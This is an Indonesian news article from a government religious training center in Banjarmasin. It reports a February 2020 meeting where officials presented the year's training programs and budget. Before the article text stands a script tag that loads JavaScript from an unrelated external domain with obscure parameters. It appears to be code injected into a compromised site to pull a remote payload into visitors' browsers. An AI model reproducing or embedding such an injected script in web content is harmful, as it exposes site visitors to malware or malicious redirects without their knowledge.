<script async src='https://slow.destinyfernandi.com/dbekjrhg3?type=d&frm=scr&' type='text/javascript'></script>

Rapat Pemantapan Kegiatan BDK Banjarmasin Tahun 2020

Mengawali tahun anggaran baru Tahun 2020, Balai Diklat Keagamaan ( BDK ) Banjarmasin mengadakan rapat persiapan dalam rangka untuk pemantapan kegiatan / program kerja yang akan dilaksanakan pada tahun 2020.

Rapat Pemantapan ini dilaksanakan di aula utama BDK Banjarmasin pada hari selasa tanggal 4 Pebruari 2020 mulai pukul 09,00 sampai 12.30 Wita dan diikuti oleh seluruh pimpinan / pejabat struktural dan fungsional serta seluruh ASN / PNS, pada BDK Banjarmasin.Rapat pemantapan ini dimaksudkan untuk membahas Rencana kegiatan, program kerja disesuaikan dengan anggaran yang termaktub dalam DIPA tahun 2020 dan mendapatkan masukan / input dari para peserta rapat menyangkut hal – hal yang masih dianggap perlu untuk dilakukan revisi / perbaikan

Para Pimpinan / pejabat yang menghadiri rapat pemantapan ini yaitu Kepala BDK Banjarmasin H. Humaidi, H. Abd. Manan ( Kasubbag TU ), Muhran ( Kasi Diklat TTPK ), Erna Zainah ( Kasi Diklat Adm ), dan H. Yasir Arafat ( Koordinator Widyaiswara )

Rapat Pemantapan ini dibuka dan dipimpin langsung oleh kepala BDK Banjarmasin Drs.H. Humaidi.S.Sos.MAP  Dalam sambutannya beliau menegaskan bahwa program kerja dan kegiatan BDK Banjarmasin untuk tahun 2020 ini harus mencerminkan kebersamaan dan tidak menonjolkan unsur pimpinan saja, namun menampilkan aspek lembaga BDK Banjarmasin secara utuh serta seluruh elemen yang ada di dalamnnya.

            Oleh karena itu beliau sangat mengaharapkan agar seluruh PNS / ASN secara aktif ikut serta bersama – sama memberikan masukan, saran, dan pendapat menyangkut program kegiatan dan anggaran yang akan dilaksanakan pada tahun 2020 ini.

 

Pemaparan mengenai program kegiatan dan anggaran yang akan dilaksanakan tahun 2020 ini selanjutnya adalah dari H. Abd. Manan selaku Kasubbag TU

Beliau memamparkan berbagai rencana kegiatan dan penggunaan anggaran dibawah laingkup tata usaha mulai belanja pegawai, pengadaan barang dan jasa, pemeliharaan sarana prasarana, peningkatan SDM pegawai, sistem / pola kerja tenaga honorer, dan kegiatan lainnya.

Melalui slide di layar beliau menjelaskan mengenai beberapa program kegiatan yang sudah direncakan untuk dilaksanakan disesuaikan anggaran yang tersedia dalam DIPA. Baliau juga mengaharapkan adanya usulan dan saran menyangkut rencana kegiatan – kegiatan tersebut.

Berikutnya adalah Drs. Muhran selaku Kasi Dikjlat TTPK yang menyampaikan rencana kegiatan yang disusun oleh Seksi Diklat Tenaga Teknis Pendidikan dan Keagamaan (TTPK) untuk tahun 2020 ini.

Dalam paparannya beliau menjelaskan tentang rencana program kegiatan diklat Teknis pendidikan dan keagamaan tahun 2020. Beliau menyoroti tentang jumlah anggaran dan jumlah kegiatan diklat yang lebih sedikit dari tahun – tahun sebelumnya. Beliau juga menyoroti tentang beberapa pos anggaran yang mungkin bisa dilakukan revisi atau perbaikan untuk dbuat kegiatan – kegiatan yang lebih menitik beratkan untuk perkembangan kediklatan

 

 

Berikutnya adalah paparan program dari Seksi Diklat Administrasi yang disampaikan oleh Kasi Diklat Tenaga Adm. Dra Erna Zainah, MM. Beliau menjelasakan tentang pelaksanaan kegiatan seksi Diklat Tenaga Adm tahun sebelumnya yaitu pelaksanaan LATSAR CPNS dan beberapa hal yang harus dibenahi dan diselesaikan seperti penilaian dan sertifikat diklat.

 

 

 

 

 

 

 

Sedangkan untuk program kegiatan tahun 2020 ini beliau menjelaskan tentang program kegiatan – kegiatan diklat antara lain diklat PIM, Pengelolaan BMN, Pengelolaan Tata Naskah, dan lainnya. Dalam rapat tersebut beberapa peserta rapat memberikan usul, pendapat, koreksi, dan masukan – masukan lainnya antara lain menyangkut penggunaan pos anggaran, pengadaan barang jasa, peningkatan SDM, dan lain – lain.

Semoga hasil rapat pemantapan ini bisa menghasilkan keputusan dan kebijakan yang berpihak pada peningkatan kualitas SDM, kualitas pelayanan, kualitas diklat, dan kualitas hasil pada Balai Diklat Keagamaan Banjarmasin sesuai dengan Tupoksi BDK Banjarmasin